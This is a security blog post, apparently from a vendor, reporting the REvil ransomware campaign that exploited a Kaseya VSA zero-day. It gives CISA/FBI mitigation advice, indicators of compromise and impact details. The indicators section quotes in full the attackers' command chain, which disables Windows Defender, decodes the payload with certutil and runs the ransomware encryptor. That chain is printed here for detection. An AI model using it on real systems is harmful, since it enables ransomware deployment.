You are currently viewing Kaseya’s Virtual System/Server Administrator (VSA) Zero-Day Under Active Exploitation By REvil Ransomware

Kaseya’s Virtual System/Server Administrator (VSA) Zero-Day Under Active Exploitation By REvil Ransomware

Kaseya is a US-based organization that provides IT and security management solutions for managed service providers (MSPs) and small to medium-sized businesses (SMBs) worldwide. One of its tools, called Kaseya’s VSA, is under active exploitation and used as an attack vector to install REvil ransomware worldwide. Kaseya VSA (Virtual System/Server Administrator) is software that provides a centralized console to monitor and manage endpoints, automate IT processes, deploy security patches, and control access. It is available either as a hosted cloud service or via on-premises VSA servers.

On July 2nd, when the Kaseya was in the process of fixing various zero-day vulnerabilities reported privately to it, REvil ransomware operators started exploiting the zero-day vulnerabilities to deploy ransomware. Many companies whose networks were managed using Kaseya Virtual System Administrator (VSA) became the victims of this large-scale ransomware attack. More than 1500 businesses worldwide are believed to be affected by this attack. The REvil ransomware group, however, claims to have encrypted over 1,000,000 systems worldwide in this attack. Researchers at the Dutch Institute for Vulnerability Disclosure (DIVD), who reported many zero-day vulnerabilities believe that the vulnerability identified with CVE-2021-30116 is being used in these ransomware attacks. Though, they have not provided any further details about the other vulnerabilities.

REvil Ransomware

REvil (Ransomware Evil), also known as Sodinokibi, operates as ransomware-as-a-service (RaaS), meaning anyone can buy the service and use the ransomware payload and infrastructure to manage the victim communications distribution of decryption tools. REvil ransomware operators prefer to recruit affiliates to distribute the ransomware instead of attacking companies directly and split the revenue generated from ransom payments. Like many other ransomware families, REvil maintains a website where they publish details of their latest victims and the files collected from them. On their website page called ‘Happy Blog,’ REvil has confirmed that they were behind the attack against Kaseya and has demanded a ransom of 70 million dollars to decrypt files on all organizations affected by this attack.
As per one researcher, the REvil gang has now lowered its demand from 70 million dollars to 50 million dollars. REvil ransomware uses the Salsa20 symmetric stream algorithm for encryption of data and elliptic curve asymmetric algorithm for encrypting the keys. The decryption of files affected by REvil is impossible without the operator’s keys.

CISA and FBI Advice

US Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) have shared advisory for managed service providers (MSPs) and their customers impacted by this REvil ransomware attack. The MSPs affected by the attack are advised to check their systems for signs of compromise using Kaseya’s detection tool and enable multi-factor authentication (MFA) on as many accounts as possible. MSPs should also implement allowlists to limit access to their internal assets and protect their remote monitoring tools’ admin interface using firewalls or VPNs. The complete list is mentioned below.

  • Download the Kaseya VSA Detection Tool
  • This tool analyzes a system (either VSA server or managed endpoint) and determines whether any compromise (IOCs) indicators are present.
  • Enable and enforce multi-factor authentication (MFA) on every single account under the organization’s control, and—to the maximum extent possible—enable and enforce MFA for customer-facing services.
  • Implement allow the listing to limit communication with remote monitoring and management (RMM) capabilities to known IP address pairs and/or
  • Place administrative interfaces of RMM behind a virtual private network (VPN) or a firewall on a dedicated administrative network.

CISA and the FBI also advise affected MSP customers to:

  • Ensure backups are up to date and stored in an easily retrievable location air-gapped from the organizational network.
  • Revert to a manual patch management process that follows vendor remediation guidance, including installing new patches as soon as they become available.
  • Implement MFA and principle of least privilege on key network resources admin accounts.

Indicators of Compromise

Security researchers at Huntress Labs have provided details on initial indicators of compromise for this attack.

Kaseya VSA Servers details of intrusion include:

  • Attackers uploaded agent.crt and Screenshot.jpg to exploited VSA servers, and this activity can be found in KUpload.log (which *may* be wiped by the attackers or encrypted by ransomware if a VSA agent was also installed on the VSA server).

  • A series of GET and POST requests using curl can be found within the KaseyaEdgeServices logs located in %ProgramData%\Kaseya\Log\KaseyaEdgeServices directory with a file name following this modified ISO8601 naming scheme KaseyaEdgeServices-YYYY-MM-DDTHH-MM-SSZ.log.

  • Attackers came from the following IP addresses using the user agent curl/7.69.1:
    18.223.199[.]234 (Amazon Web Services)
    161.35.239[.]148 (Digital Ocean)
    35.226.94[.]113 (Google Cloud)
    162.253.124[.]162 (Sapioterra)

  • The VSA procedure used to deploy the encryptor was named “Kaseya VSA Agent Hot-fix.” An additional procedure named “Archive and Purge Logs” was run to clean up after themselves (screenshot here)

  • The “Kaseya VSA Agent Hot-fix” procedure ran the following: "C:\WINDOWS\system32\cmd.exe"
    /c ping 127.0.0.1 -n 4979 > nul &
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Set-MpPreference -DisableRealtimeMonitoring $true
    -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true
    -DisableScriptScanning $true -EnableControlledFolderAccess Disabled
    -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled
    -SubmitSamplesConsent NeverSend & copy /Y
    C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM%
    >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode
    c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f
    c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

Kaseya VSA agent details of intrusion include:

  • Ransomware encryptors pushed via the Kaseya VSA agent were dropped in TempPath with the file name agent.crt and decoded to agent.exe. TempPath resolves to c:\kworking\agent.exe by default and is configurable within HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Kaseya\Agent\<unique id>

  • When agent.exe runs, the legitimate Windows Defender executable MsMpEng.exe and the encryptor payload mpsvc.dll are dropped into the hardcoded path “c:\Windows” to perform DLL sideloading.

  • The mpsvc.dll Sodinokibi DLL creates the registry key HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\BlackLivesMatter which contains several registry values that store encryptor runtime keys/configurations artifacts.

  • agent.crt – MD5: 939aae3cc456de8964cb182c75a5f8cc – Encoded malicious content

  • agent.exe – MD5: 561cffbaba71a6e8cc1cdceda990ead4 – Decoded contents of agent.crt

  • cert.exe – MD5: <random due to appended string> – Legitimate Windows certutil.exe utility

  • mpsvc.dll – MD5: a47cf00aedf769d60d58bfe00c0b5421– REvil encryptor payload


Affected Applications

All versions of On-Premises Virtual System/Server Administrator (VSA)


Global impact

This has been the largest ransomware attack on record, affecting close to 1500 of Kaseya’s clients spread across 17 countries. The full impact of the attack is still being analysed by cybersecurity professionals globally.

Huntress Labs has been closely monitoring this situation as it unfolds, reported that 30 MSPs were affected, consequently affecting 1000s of dependent businesses.

Some events as per news reports:

  • One of the most significant impacts were when 800 stores of Swedish supermarket chain Coop had to be closed after their cash registers were disabled during the attack. Swedish state railway services and a prominent pharmacy chain was also affected to varying degrees by the attack.
  • 100 kindergartens in New Zealand had their computers disabled, furthermore 9 schools have also been affected in some manner.

As per Kaseya’s status webpage:

“All VSA SaaS servers will be put into maintenance mode. We apologize for any inconvenience. – Kaseya Cloud Operations Team”


Solution

Kaseya has advised all on-premise customers to keep VSA Servers offline until a patch is available. Kaseya has also stated that the on-premises patch timeline is 24 hours (or less) from the restoration of SaaS services. Kaseya is also in the process of bringing its SaaS servers online.

Subscribe For More Posts Like This

Get the latest research, best practices, industry trends and cybersecurity blogs from SecPod security experts

Invalid email address
We promise not to spam you. You can unsubscribe at any time.
0 0 votes
Article Rating
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments